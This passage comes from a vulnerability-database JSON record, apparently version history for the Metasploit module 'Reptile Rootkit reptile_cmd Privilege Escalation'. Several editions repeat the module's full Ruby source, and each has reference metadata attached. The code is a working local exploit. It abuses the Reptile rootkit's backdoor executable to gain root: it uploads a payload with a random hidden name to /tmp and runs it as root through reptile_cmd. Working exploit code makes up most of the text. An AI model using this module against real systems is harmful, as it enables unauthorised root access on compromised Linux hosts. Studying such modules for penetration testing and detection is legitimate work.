['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-16T21:52:44", "differentElements": ["modified", "published"], "edition": 104}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-20T00:37:13", "history": [], "viewCount": 53, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1495", "ELSA-2020-5653", "ELSA-2020-5654", "ELSA-2020-1489", "ELSA-2020-1497"]}, {"type": "kitploit", "idList": ["KITPLOIT:3835831876788290423", "KITPLOIT:6369888049214654945"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0534-1"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:A2FF22852785231BD2B16FA55814079E", "PENTESTPARTNERS:B2D55AD828B3CAF54A75592EC7A41C46"]}, {"type": "mskb", "idList": ["KB4494352", "KB4505225"]}, {"type": "cve", "idList": ["CVE-2019-7306"]}, {"type": "amazon", "idList": ["ALAS-2020-1357"]}, {"type": "exploitdb", "idList": ["EDB-ID:48339", "EDB-ID:48343", "EDB-ID:48340"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143722"]}, {"type": "nessus", "idList": ["ADOBE_AFTER_EFFECTS_APSB20-21.NASL"]}], "modified": "2020-04-16T21:52:44", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2020-04-16T21:52:44", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-20T00:37:13", "differentElements": ["modified", "published"], "edition": 105}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-20T04:23:31", "history": [], "viewCount": 53, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1495", "ELSA-2020-5653", "ELSA-2020-5654", "ELSA-2020-1489", "ELSA-2020-1497"]}, {"type": "kitploit", "idList": ["KITPLOIT:3835831876788290423", "KITPLOIT:6369888049214654945"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0534-1"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:A2FF22852785231BD2B16FA55814079E", "PENTESTPARTNERS:B2D55AD828B3CAF54A75592EC7A41C46"]}, {"type": "mskb", "idList": ["KB4494352", "KB4505225"]}, {"type": "cve", "idList": ["CVE-2019-7306"]}, {"type": "amazon", "idList": ["ALAS-2020-1357"]}, {"type": "exploitdb", "idList": ["EDB-ID:48339", "EDB-ID:48343", "EDB-ID:48340"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143722"]}, {"type": "nessus", "idList": ["ADOBE_AFTER_EFFECTS_APSB20-21.NASL"]}], "modified": "2020-04-16T21:52:44", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2020-04-16T21:52:44", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-20T04:23:31", "differentElements": ["sourceData"], "edition": 106}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-20T08:24:20", "history": [], "viewCount": 53, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1495", "ELSA-2020-5653", "ELSA-2020-5654", "ELSA-2020-1489", "ELSA-2020-1497"]}, {"type": "kitploit", "idList": ["KITPLOIT:3835831876788290423", "KITPLOIT:6369888049214654945"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0534-1"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:A2FF22852785231BD2B16FA55814079E", "PENTESTPARTNERS:B2D55AD828B3CAF54A75592EC7A41C46"]}, {"type": "mskb", "idList": ["KB4494352", "KB4505225"]}, {"type": "cve", "idList": ["CVE-2019-7306"]}, {"type": "amazon", "idList": ["ALAS-2020-1357"]}, {"type": "exploitdb", "idList": ["EDB-ID:48339", "EDB-ID:48343", "EDB-ID:48340"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143722"]}, {"type": "nessus", "idList": ["ADOBE_AFTER_EFFECTS_APSB20-21.NASL"]}], "modified": "2020-04-16T21:52:44", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2020-04-16T21:52:44", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-20T08:24:20", "differentElements": ["sourceData"], "edition": 107}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-20T10:27:13", "history": [], "viewCount": 53, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "amazon", "idList": ["ALAS-2020-1362", "ALAS-2020-1360", "ALAS-2020-1359", "ALAS-2020-1361", "ALAS-2020-1358"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0543-1", "OPENSUSE-SU-2020:0545-1"]}, {"type": "threatpost", "idList": ["THREATPOST:1AD5D2A16F23798B7191375E4C3E9F1B"]}, {"type": "kitploit", "idList": ["KITPLOIT:8285766177759936382"]}, {"type": "mskb", "idList": ["KB3174644", "KB3185331", "KB3062157"]}, {"type": "nessus", "idList": ["MONGODB_SERVER_3_3_14_25335.NASL", "MACOSX_GOOGLE_CHROME_81_0_4044_122.NASL", "GOOGLE_CHROME_81_0_4044_122.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1561", "ELSA-2020-1524"]}, {"type": "exploitdb", "idList": ["EDB-ID:48375"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:A6BB54E614972BC1F16419D7DB82331A"]}], "modified": "2020-04-20T10:27:13", "rev": 2}, "score": {"value": 0.5, "vector": "NONE", "modified": "2020-04-20T10:27:13", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-20T10:27:13", "differentElements": ["sourceData"], "edition": 108}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-24T10:03:15", "history": [], "viewCount": 53, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:AC0C28A61401A117D2DE59B91D235367"]}, {"type": "exploitdb", "idList": ["EDB-ID:48380", "EDB-ID:48378", "EDB-ID:48375"]}, {"type": "amazon", "idList": ["ALAS-2020-1359", "ALAS-2020-1360", "ALAS-2020-1362", "ALAS-2020-1358", "ALAS-2020-1361"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0545-1", "OPENSUSE-SU-2020:0543-1"]}, {"type": "threatpost", "idList": ["THREATPOST:1AD5D2A16F23798B7191375E4C3E9F1B"]}, {"type": "kitploit", "idList": ["KITPLOIT:8285766177759936382"]}, {"type": "mskb", "idList": ["KB3062157", "KB3174644", "KB3185331"]}, {"type": "nessus", "idList": ["GOOGLE_CHROME_81_0_4044_122.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1524", "ELSA-2020-1561"]}], "modified": "2020-04-24T10:03:15", "rev": 2}, "score": {"value": 2.6, "vector": "NONE", "modified": "2020-04-24T10:03:15", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-24T10:03:15", "differentElements": ["sourceData"], "edition": 109}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-24T17:46:36", "history": [], "viewCount": 53, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:AC0C28A61401A117D2DE59B91D235367"]}, {"type": "exploitdb", "idList": ["EDB-ID:48378", "EDB-ID:48380"]}, {"type": "amazon", "idList": ["ALAS-2020-1361", "ALAS-2020-1360", "ALAS-2020-1359", "ALAS-2020-1362", "ALAS-2020-1358"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0545-1", "OPENSUSE-SU-2020:0543-1"]}, {"type": "threatpost", "idList": ["THREATPOST:1AD5D2A16F23798B7191375E4C3E9F1B"]}, {"type": "kitploit", "idList": ["KITPLOIT:8285766177759936382"]}, {"type": "mscve", "idList": ["MS:ADV200004"]}, {"type": "mskb", "idList": ["KB3062157", "KB3174644", "KB3185331"]}, {"type": "nessus", "idList": ["MONGODB_SERVER_3_3_14_25335.NASL", "GOOGLE_CHROME_81_0_4044_122.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1561"]}], "modified": "2020-04-24T17:46:36", "rev": 2}, "score": {"value": 0.3, "vector": "NONE", "modified": "2020-04-24T17:46:36", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", 